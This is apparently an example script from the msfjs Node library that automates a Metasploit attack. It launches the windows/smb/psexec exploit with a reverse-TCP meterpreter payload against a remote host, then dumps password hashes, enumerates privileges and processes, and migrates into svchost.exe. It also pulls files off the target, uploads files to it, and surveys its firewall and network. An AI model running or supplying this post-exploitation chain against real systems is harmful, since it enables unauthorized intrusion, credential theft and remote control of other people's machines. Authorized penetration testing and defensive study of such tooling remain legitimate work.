msfjs
Version:
Node library for interacting with metasploit
632 lines (390 loc) • 11.5 kB
JavaScript
// Check for required CLI args.
if(process.argv.length <= 5) {
console.log("node exploit.js <localip> <remoteip> <smbuser> <smbpass>");
process.exit();
}
// Require the needed libraries.
var msfjs = require('../lib')(),
async = require('async');
/*
Create a new meterpreter payload, using the psexec exploit.
The relevant options are passed for the exploit (rhost, SMBUser & SMBPass) and the payload (lhost)
*/
var exploit = new msfjs.Meterpreter("windows/smb/psexec", {
lhost: process.argv[2],
rhost: process.argv[3],
SMBUser: process.argv[4],
SMBPass: process.argv[5],
/*
You can specify a custom meterpreter payload, defaults to windows/meterpreter/reverse_tcp
payload: "windows/meterpreter/bind_tcp"
*/
});
/*
Pass the exploit to launch, this handles launching the exploit,
then control is passed to the handle function of the exploit.
An eventemitter is passed to the callback.
*/
msfjs.Exploits.launch(exploit, function(status) {
console.log("Launching windows/smb/psexec at " + process.argv[3]);
/*
The exploit was successful!
A "session" (used to interact with the current session.. who knew?) is passed to the callback.
The session class provides easy access to most meterpreter
commands, getpid, download, etc. It executes them and then
parses their response. So you don't have todo anything!
*/
status.on("success", function(session) {
console.log("Session established from " + session.connection.from.host + ":" +
session.connection.from.port + " to " + session.connection.to.host + ":" + session.connection.to.port);
/*
We got a meterpreter prompt! (ie. meterpreter >)
*/
session.once("prompt", function() {
var oldpid = null;
async.series([
function(cb) {
/*
Returns the current PID as a number.
If an error occured null will be returned.
*/
session.getpid(function(pid) {
console.log("Current PID: " + pid)
oldpid = pid;
cb();
});
},
function(cb) {
/*
Returns the current UID as a string.
If an error occured null will be returned.
*/
session.getuid(function(uid) {
console.log("Current UID: " + uid);
cb();
});
},
function(cb) {
/*
Returns an object of system information.
Example:
{
computer: 'ADAM-PC',
os: 'Windows 7 (Build 7600).',
arch: 'x86',
language: 'en_US',
meterpreter: 'x86/win32'
}
*/
session.sysinfo(function(info) {
console.log("Computer name: " + info.computer);
console.log("Computer arch: " + info.arch);
cb();
});
},
function(cb) {
/*
Runs hashdump and parses the output, returning an array of objects.
Example:
[
{
user: 'adam',
id: '1001',
lm: 'aad3b435b51404eeaad3b435b51404ee',
lm1: 'aad3b435b51404ee',
lm2: 'aad3b435b51404ee',
ntlm: 'CE6D4897C160293BA1246AF843D719CA'
}
]
*/
session.hashdump(function(hashes) {
console.log("hashdump got " + hashes.length + " hashes. First username is " + hashes[0].user);
cb();
});
},
function(cb) {
/*
Gets the privileges of the current program.
Returns an array.
Example:
[
'SeDebugPrivilege',
'SeTcbPrivilege',
'SeAssignPrimaryTokenPrivilege',
'SeLockMemoryPrivilege',
'SeIncreaseQuotaPrivilege'
..snip
]
*/
session.getprivs(function(privs) {
console.log("current proccess has " + privs.length + " privs.");
cb();
});
},
function(cb) {
/*
Gets the currently accessable desktops.
Returns an array of objects.
Example:
[
{ session: '0', station: 'WinSta0', name: 'Default' },
{ session: '0', station: 'WinSta0', name: 'Disconnect' },
{ session: '0', station: 'WinSta0', name: 'Winlogon' },
{ session: '0', station: 'msswindowstation' name: 'mssrestricteddesk' }
]
*/
session.enumdesktops(function(desktops) {
console.log("Got " + desktops.length + " desktops. First ones station is " + desktops[0].station);
cb();
});
},
function(cb) {
/*
Gets all currently running processes.
Returns an array of objects.
Example:
[
{
pid: '424',
ppid: '376',
file: 'winlogon.exe',
arch: 'x86',
session: '1',
user: 'NT AUTHORITY\\SYSTEM',
path: 'C:\\Windows\\system32\\winlogon.exe'
},
{
pid: '484',
ppid: '384',
file: 'services.exe',
arch: 'x86',
session: '0',
user: 'NT AUTHORITY\\SYSTEM',
path: 'C:\\Windows\\system32\\services.exe'
}
..snip
]
*/
session.ps(function(processes) {
console.log(processes.length + " proccesses running. First process filepath is "+ processes[0].path);
var proc = null;
for(var i = 0; i < processes.length; i++) {
if(processes[i].file == "svchost.exe") {
proc = processes[i];
break;
}
}
/*
Migrates to another process.
Pass the PID of the process you wish to migrate as the first argument.
The error field is populated if the migrate failed, in which case res would equal false.
*/
session.migrate(proc.pid, function(err, res) {
if(!res) {
console.error("Could not migrate!");
console.error(err);
return;
}
console.log("PID before migration " + oldpid + ", migrating to " + proc.file + " (" + proc.pid + ")");
/*
Same as above.
*/
session.getpid(function(newpid) {
console.log("PID after migration " + newpid);
cb();
});
});
});
},
function(cb) {
/*
Store the filesystem commands in an easier to use var (who doesn't like less typing?)
*/
var fs = session.filesystem();
async.series([
function(cb2) {
/*
Returns the working directory of the remote filesystem for the current session
*/
fs.pwd(function(wd) {
console.log("Current working dir: " + wd);
cb2();
});
},
function(cb2) {
console.log("Changing working dir to %WINDIR%");
/*
Changed the current working directory to the first argument passed.
Yes, even environment variables work!
*/
fs.cd("%WINDIR%", function() {
cb2();
});
},
function(cb2) {
console.log("Listing files..");
/*
Lists all files in the current worrking directory.
Returns an array of objects.
Example:
[
{
file: 'notepad.exe',
mode: '100777/rwxrwxrwx',
size: '179712',
type: 'file',
modified: '2009-07-14 10:14:27 +1000'
},
{
file: 'regedit.exe',
mode: '100777/rwxrwxrwx',
size: '398336',
type: 'file',
modified: '2009-07-14 10:14:30 +1000'
}
..snip
]
*/
fs.ls(function(files) {
console.log("Got " + files.length + " files from %WINDIR%");
cb2();
});
},
function(cb2) {
console.log("Downloading file..");
/*
Downloads a file.
Pass the file you wish to download (absolute or relative to current working dir) as the first arg
and the destination as the second arg.
The error field is populated if the download failed, in which case result would equal false.
*/
fs.download("explorer.exe", "/tmp/explorer.exe", function(err, result) {
if(!result) {
console.error("Failed to download file...");
console.error(err);
process.exit();
}
console.log("Downloaded %WINDIR%\\explorer.exe to /tmp/explorer.exe");
cb2();
});
},
function(cb2) {
console.log("Changing working dir to %TMP%");
console.log("(depending on your UID the end location may vary)");
/*
Same as above.
*/
fs.cd("%TMP%", function() {
cb2();
});
},
function(cb2) {
console.log("Reuploading /tmp/explorer.exe to %TMP%\\explorer.exe");
/*
Same as download, except the first argument is the file you wish to upload
and the second is the folder you wish to upload to.
*/
fs.upload("/tmp/explorer.exe", "%TMP%", function(err, result) {
if(!result) {
console.error("Failed to download file...");
console.error(err);
process.exit();
}
console.log("Successfully uploaded file!");
cb2();
});
}
], function() {
cb();
});
}, function(cb) {
/*
Runs getcountermeasure and checks if Windows Firewall is enabled
Example:
{
operational: true,
exception: false
}
*/
session.getcountermeasures(function(res) {
console.log("Windows Firewall is", res.operational ? "enabled" : "disabled");
cb();
});
}, function(cb) {
/*
Finds all the network interfaces.
Returns an array of objects.
Example:
[
{
name: 'Software Loopback Interface 1',
mac: '00:00:00:00:00:00',
mtu: '1500',
address: '127.0.0.1',
netmask: '255.0.0.0'
},
{
name: 'Intel(R) PRO/1000 MT Desktop Adapter',
mac: '12:34:56:78:98:76',
mtu: '1500',
address: '192.168.13.37',
netmask: '255.255.255.0'
}
]
*/
session.ifconfig(function(interfaces) {
console.log("Found " + interfaces.length + " network interfaces");
cb();
});
}, function(cb) {
/*
Gets routes from the ARP command.
Returns an array of objects.
Example:
[
{
address: '192.168.13.1',
mac: '11:22:33:44:55:66',
interface: '11'
},
{
address: '192.168.13.2',
mac: '11:22:33:44:33:22',
interface: '11' },
{
address: '192.168.13.5',
mac: '66:55:44:33:22:11',
interface: '11'
}
..snip
]
*/
session.arp(function(routes) {
console.log("Found " + routes.length + " ARP routes.");
cb();
});
}, function(cb) {
/*
Executes the WMIC command given as the first argument.
Example:
session.wmic("computersystem get Name,Manufacturer")
will return
{
name: "ComputerName",
manufacturer: "ComputerManufacturer"
}
*/
session.wmic("computersystem get Name", function(data) {
console.log("Computer Name: " + data.name)
cb();
});
}], function() {
console.log("Example finished... exiting..");
process.exit();
});
});
});
status.on("error", function(err) {
console.error(err);
});
});